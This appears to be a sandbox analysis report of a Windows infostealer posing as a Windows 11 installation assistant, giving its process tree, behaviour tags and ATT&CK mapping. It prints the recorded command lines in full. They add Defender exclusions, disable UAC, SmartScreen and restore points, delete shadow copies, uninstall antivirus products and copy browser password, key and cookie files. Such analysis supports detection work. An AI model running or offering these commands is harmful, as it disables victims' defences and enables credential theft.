                  "C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
                  - Executes dropped EXE
                  - System Location Discovery: System Language Discovery
                  - Modifies data under HKEY_USERS
                [9] C:\Windows\system32\rEg.EXE (PID 640)
                    "C:\Windows\system32\rEg.EXE" Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
                    - Windows security bypass
          [6] C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe (PID 304)
              rP.EXE /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe (PID 4768)
                "C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
              [8] C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe (PID 1644)
                  "C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
                  - Executes dropped EXE
                  - System Location Discovery: System Language Discovery
                  - Modifies data under HKEY_USERS
                [9] C:\Windows\system32\rEg.EXE (PID 3856)
                    "C:\Windows\system32\rEg.EXE" Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
                    - Windows security bypass
          [6] C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe (PID 3780)
              rp.EXE /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
            [7] C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe (PID 4848)
                "C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
              [8] C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe (PID 2248)
                  "C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
                  - Executes dropped EXE
                  - System Location Discovery: System Language Discovery
                  - Modifies data under HKEY_USERS
                [9] C:\Windows\system32\rEG.EXE (PID 4872)
                    "C:\Windows\system32\rEG.EXE" Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
                    No signature is attached to this one, but PUAProtection = 0 turns off Defender's blocking of potentially unwanted applications.
        [5] C:\Windows\SysWOW64\cmd.exe (PID 4388)
            "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\.cmd""
            - System Location Discovery: System Language Discovery
          [6] C:\Windows\SysWOW64\cmd.exe (PID 304)
              C:\Windows\system32\cmd.exe /c CUrL -S ipINFO.io/Ip
              - System Location Discovery: System Language Discovery
            [7] C:\Windows\SysWOW64\curl.exe (PID 60)
                CUrL -S ipINFO.io/Ip
                - System Location Discovery: System Language Discovery
        [5] C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr (PID 1276)
            "C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - System Location Discovery: System Language Discovery
            - Suspicious use of SetWindowsHookEx
            The file name spells "Installation" with two capital I's where its own directory name, and the Startup shortcut, use lowercase l's.
          [6] C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr (PID 1652)
              "C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"
              - Checks BIOS information in registry
              - Checks computer location settings
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Checks processor information in registry
              - Enumerates system info in registry
              Hollowed copy of its parent (the SetThreadContext row targets this PID). This is the instance that fingerprints the machine and runs the PowerShell copies below; cpi is PowerShell's built-in alias for Copy-Item. logins.json holds Firefox's encrypted saved logins and key4.db (key3.db in older profiles) the NSS key that decrypts them, so taking both allows offline recovery of the passwords; cert9.db, prefs.js, cookies.sqlite and formhistory.sqlite are the certificate store, preferences, cookies and form autofill history. Each of the two profiles (b2bi5a2x.Admin and enjqfdim.default-release) is copied twice, to fresh temp names each time.
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3852)
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\ob7cfhzse9oqu7xo240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\zx14njk1cjdm240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\4a7e2c0lq5gi240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\i8isbple5q9z240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\4tcj2ww5i240651515.tmp\" -Force"
                - Suspicious behavior: EnumeratesProcesses
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2444)
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\m0eesb0kzpngmd240661625.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\c6lq96fwvpih240661625.tmp\" -Force"
                - Suspicious behavior: EnumeratesProcesses
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2944)
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\9dv01842bcf3zfv240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\q2rescb6240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\434n2sz6anbo50bs240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\qrr2ejo103240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\2rjjl1u3y2240683609.tmp\" -Force"
                - Suspicious behavior: EnumeratesProcesses
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3700)
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\67koeg4x240690375.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\y63thibysbnp6i240690375.tmp\" -Force"
                - Suspicious behavior: EnumeratesProcesses
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4660)
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\5oy242k24e240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\l2a139w1240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\jom9k7j13240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\2opxstaet240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\yf6pw5mchnd240696171.tmp\" -Force"
                - Suspicious behavior: EnumeratesProcesses
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5060)
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\rgf72ajgb240705546.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\a388vq9la0kvz71240705546.tmp\" -Force"
                - Suspicious behavior: EnumeratesProcesses
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3132)
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\4vt3u3tjt240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\tbzqz5bgb6240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\8cbcluskncja3240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\uetb77q1gtv240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\arxozshvs240714531.tmp\" -Force"
                - Suspicious behavior: EnumeratesProcesses
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID not recorded; the listing is cut off here)
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ibgqcei52nq6amwa240720984.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\natpu47qqegcjqaw240720984.tmp\" -Force"
- Suspicious behavior: EnumeratesProcesses
PID:2236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\lz1l7ec52tnr78240727468.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\zslvhu8uvd240727468.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\vjohb7g5en8240727562.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\m7irgx4mlmnf1240727562.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\vhzjq0p3twn240741062.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\l6mrxkjyktx240741062.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\4kqxrdxny0240741156.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\0dsbrq84ff6u240741156.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2456
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\Desktop\BlockHide.M2TS\" \"C:\Users\Admin\AppData\Local\Temp\w6cae20njgw94pi5uw3kr8hk34.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\BlockPop.jpg\" \"C:\Users\Admin\AppData\Local\Temp\jjtzxmz59zyyz2nrn8h0v.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\BlockRedo.crw\" \"C:\Users\Admin\AppData\Local\Temp\f7jnqgmt7wcgwj6dq0o9.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CompressSave.DVR\" \"C:\Users\Admin\AppData\Local\Temp\d0yas27fwgf324tiv8yu9gjq2cda2.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CompressStop.gif\" \"C:\Users\Admin\AppData\Local\Temp\u60eqlkv72kuzf2o0z9te0d.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\DisconnectExpand.jpg\" \"C:\Users\Admin\AppData\Local\Temp\5xsnbobwf8hhgj9fyun0f6tzd05.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ExportUnprotect.pps\" \"C:\Users\Admin\AppData\Local\Temp\kakl6szvzqmrwl1zxl9azojz4.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\NewBackup.ram\" \"C:\Users\Admin\AppData\Local\Temp\9wuohmvd26ur9fiar3u605.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\OptimizeConvert.au\" \"C:\Users\Admin\AppData\Local\Temp\l08pizqa7zhc9gnefvbec3tkq1.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\PopAssert.clr\" \"C:\Users\Admin\AppData\Local\Temp\154zpnv0d74nnk9ehz5lk5x.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\RegisterResize.docx\" \"C:\Users\Admin\AppData\Local\Temp\chisdkm4kxsbov24b02f.tmp\" -Force"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4160
-
-
-
-
-
-
-
Depth 1: C:\Windows\System32\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID: 1652

Depth 2: C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c ""C:\tmp\.cmd" "
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID: 2360

Depth 3: C:\Windows\system32\reg.exe
Command line: rEg Add "hKLm\sOftWare\microsOfT\windOws\CurrentVersiOn\polICIEs\sysTem" /v "COnsenTPrompTbEhAvIoradmin" /T rEG_dWOrd /d "0" /F
- UAC bypass
PID: 4028

Depth 3: C:\Windows\system32\reg.exe
Command line: reg add "hKlm\sOfTwArE\miCrosoFt\WindoWs\currEntVersIon\PoLiCIes\sysTem" /v "COnsEnTPromptbehavIOrUser" /t reG_dWord /d "0" /f
- UAC bypass
PID: 4108

Depth 3: C:\Windows\system32\reg.exe
Command line: rEg add "hKLm\soFtwArE\micrOsofT\WIndOWs\cUrrenTVersiOn\pOliCIes\system" /V "PromPTOnsECUredesKtoP" /t reG_dWOrd /d "0" /f
- UAC bypass
PID: 3460

Depth 3: C:\Windows\system32\reg.exe
Command line: reg add "hkLm\soFtwArE\PoliCIes\micrOsoFt\WIndows dEFender\spYneT" /v "sUBmITsAmPlEsConsEnt" /t reg_dWord /d "2" /f
PID: 1116

Depth 3: C:\Windows\system32\reg.exe
Command line: reG Add "hKlm\softwAre\POlicIes\micrOsOfT\Windows dEfEnder\spyneT" /V "sPynetrePOrTIng" /t rEg_dwOrd /d "0" /f
PID: 4400

Depth 3: C:\Windows\system32\reg.exe
Command line: reG Add "hKlm\sOftwArE\pOlIcies\micrOsOFT\WIndOws dEFEndEr" /v "pUAproteCTiOn" /T rEG_dWord /d "0" /F
PID: 3968

Depth 3: C:\Windows\system32\reg.exe
Command line: rEg add "hklm\sOfTware\PolIcIEs\micrOsofT\wIndOws dEfendEr\mPenGinE" /v "mpenABlEpUs" /T reg_dWord /d "0" /F
PID: 3360

Depth 3: C:\Windows\system32\reg.exe
Command line: rEG Add "hkLm\sofTwAre\pOLiCIEs\miCrosoFT\WindoWs\sYstEm" /v "EnABLesmArTsCrEen" /t reG_dword /d "0" /F
PID: 944

Depth 3: C:\Windows\system32\reg.exe
Command line: reG Add "hKlm\sOFTWare\mIcrosoFT\windoWs\cUrrEntVErsiOn\eXPLOrer" /V "smArtscreenEnAblEd" /T reG_sz /d "off" /f
PID: 4352

Depth 3: C:\Windows\system32\reg.exe
Command line: rEG Add "hklm\sOftware\PoLiciEs\microsoFT\mrt" /V "donTofFerthrOuGhWUAU" /T "reG_dwOrd" /d "1" /f
PID: 1500

Depth 3: C:\Windows\system32\reg.exe
Command line: rEG Add "hklm\sOFTWare\polIcies\mICrOsoFt\mrt" /V "dontrEportInfECTIOnInFormAtion" /T "rEg_dWord" /d "1" /f
PID: 1196

Depth 3: C:\Windows\system32\reg.exe
Command line: reG add "hKlm\sOFtWAre\poLICies\mIcrosoft\WindoWs defendEr\uX configuration" /V "notIficatIon_suPPrEss" /t reG_dwOrd /d "1" /f
PID: 3804

Depth 3: C:\Windows\system32\reg.exe
Command line: rEG add "hklm\sOfTWArE\PoliCiEs\miCrosoFT\wIndoWs deFEndEr\WIndows deFender eXplOIT GUArd\ConTrolLed fOLdEr acCess" /v "enablEContrOlledfOLdEracCess" /t reg_dWord /d "0" /F
PID: 3800

Depth 3: C:\Windows\system32\reg.exe
Command line: reG add "hkLm\soFTWare\PoLicies\microsOFT\wIndOws dEfEndEr\rEpOrTInG" /v "dIsAblEEnhAncednOtIFicaTiOns" /T rEG_dword /d "1" /f
PID: 4188

Depth 3: C:\Windows\system32\reg.exe
Command line: reG add "hklm\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions" /V "dIsablEEnhAncEdnOtiFiCatiOns" /t rEg_dWord /d "1" /F
- Modifies Windows Defender notification settings
PID: 4696

Depth 3: C:\Windows\system32\reg.exe
Command line: reg add "hKLm\softWarE\mIcrosOFt\wIndows dEfender securitY centEr\vIrUs and ThreAT ProtECtIOn" /v "FIlesBLocKednOTIfiCAtiOndIsablEd" /t rEG_dwOrd /d "1" /F
PID: 4380

Depth 3: C:\Windows\system32\reg.exe
Command line: rEG Add "hkLm\sofTware\miCrOsOFt\WIndoWs defEnder seCUriTY centEr\VIrus and threAT proTectiOn" /V "nOaCTIOnnOTIFiCAtIOndIsaBLed" /T rEG_dWord /d "1" /F
PID: 3828

Depth 3: C:\Windows\system32\reg.exe
Command line: reG add "hkLm\softwAre\mIcrosOFT\WindOWs dEfEnder sECUriTy center\virUs And ThrEAt PrOteCTIon" /v "summarynOtIfIcaTIOndIsABled" /t rEG_dwOrd /d "1" /F
PID: 1620

Depth 3: C:\Windows\system32\reg.exe
Command line: reg add "hklm\sOftwAre\PolICiEs\miCrOsofT\wIndows\exPlorEr" /V "dIsABLEnOtIFICaTIoncenTer" /T rEG_dWord /d "1" /F
PID: 4540

Depth 3: C:\Windows\system32\reg.exe
Command line: rEG add "hkCu\sOFtWarE\micrOsOFT\wIndOWs\currenTVersIOn\PUshnOTIfICatIOns" /v "ToastEnablEd" /t rEg_dWord /d "0" /f
PID: 4588

Depth 3: C:\Windows\system32\reg.exe
Command line: reg Add "hKLm\soFtwarE\pOlicIes\micrOsOfT\wIndOWs dEfEnder sEcuritY CEnter\VIrUs And ThrEAT prOTECTion" /v UIlOCKdOWn /T rEG_dWOrd /d 1 /f
PID: 2492

Depth 3: C:\Windows\system32\reg.exe
Command line: rEg add "hKlm\softWArE\POlICiEs\miCrOsofT\wIndOWs dEfEndEr seCUrItY cenTEr\ApP and Browser prOtEction" /V uIloCkdoWn /T rEg_dword /d 1 /f
PID: 1928

Depth 3: C:\Windows\system32\reg.exe
Command line: reG add "hklm\sOFtWarE\POliCiEs\microsofT\wIndows nT\sysTEmrestorE" /V "disAblECOnfIG" /T reG_dword /d "1" /F
PID: 3280

Depth 3: C:\Windows\system32\reg.exe
Command line: rEG add "hKLm\soFtWAre\POLIcIes\mICrOsOFT\wIndows nT\sYsTemresTore" /v "disabLEsr" /T rEg_dword /d "1" /F
PID: 1820

Depth 3: C:\Windows\system32\reg.exe
Command line: rEG add "hKcU\sOFTWare\mIcrosOFT\WIndoWs\CUrrenTvErsIon\poLiCiEs\aTTaChmenTs" /V "sAvezOnEInformATiOn" /T rEg_dwOrd /d "1" /F
PID: 648

Depth 3: C:\Windows\system32\reg.exe
Command line: reG add "hKLm\sOfTWarE\mICrosOft\windOWs\CurrEnTvErsIon\POLiCIes\AtTachments" /V "sAvEzoneinfOrmATiOn" /T reg_dword /d "1" /f
PID: 1380

Depth 3: C:\Windows\system32\reg.exe
Command line: rEg Add "hKlm\soFTWArE\micrOsoFt\windOws\cUrrenTversiOn\POliciEs\AttachmEnTs" /v "scAnwithantivIrus" /t rEG_dwOrd /d "1" /f
PID: 4872

Depth 3: C:\Windows\system32\icacls.exe
Command line: icaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /remOve:d "EvErYOnE" /t /C
- Modifies file permissions
PID: 1664

Depth 3: C:\Windows\system32\icacls.exe
Command line: iCaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /denY "eVEryOnE":(dE,dC) /t /c
- Modifies file permissions
PID: 3424

Depth 3: C:\Windows\system32\vssadmin.exe
Command line: vssadmin dELETe shadOws /aLl /QuIEt
- Interacts with shadow copies
PID: 3848

Depth 3: C:\Windows\system32\attrib.exe
Command line: aTTrIb +S +H C:\TMP
- Sets file to hidden
- Views/modifies file attributes
PID: 2748

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 2104

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 1000

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 3672

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 844

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 2124

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 4252

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 2216

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 4600

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 1128

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
- System Network Configuration Discovery: Internet Connection Discovery
PID: 3132

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
- System Network Configuration Discovery: Internet Connection Discovery
PID: 3128

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 1528

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 2036

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 4020

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "unitedstates.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 2600

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 880

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 4860

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 1220

Depth 3: C:\Windows\system32\find.exe
Command line: find /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
PID: 2444

Depth 3: C:\Windows\System32\Wbem\WMIC.exe
Command line: wmic product where name="ESET Security" call uninstall /nointeractive
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 1676

Depth 3: C:\Windows\System32\Wbem\WMIC.exe
Command line: wmic product where name="Emsisoft Anti-Malware" call uninstall /nointeractive
- Suspicious behavior: EnumeratesProcesses
PID: 3568

Depth 3: C:\Windows\system32\reg.exe
Command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "emsisoft anti-malware" /f
PID: 3152

Depth 3: C:\Windows\system32\cmd.exe
Command line: cmd /c "C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe" /uninstall /verysilent /f
PID: 3460

Depth 1: C:\Windows\system32\vssvc.exe
Command line: C:\Windows\system32\vssvc.exe
- Suspicious use of AdjustPrivilegeToken
PID: 1376

Depth 1: C:\Windows\system32\msiexec.exe
Command line: C:\Windows\system32\msiexec.exe /V
- Suspicious use of AdjustPrivilegeToken
PID: 4420

MITRE ATT&CK Enterprise v15

Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Create or Modify System Process (1)
  - Windows Service (1)

Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Direct Volume Access (1)
- File and Directory Permissions Modification (1)
- Hide Artifacts (2)
  - Hidden Files and Directories (2)
- Impair Defenses (3)
  - Disable or Modify Tools (3)
- Indicator Removal (2)
  - File Deletion (2)
- Modify Registry (3)

Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (1)
  - Credentials In Files (1)
Downloads

Filesize: 2KB
MD5: 713ad359b75fe6d947468ec1825202b9
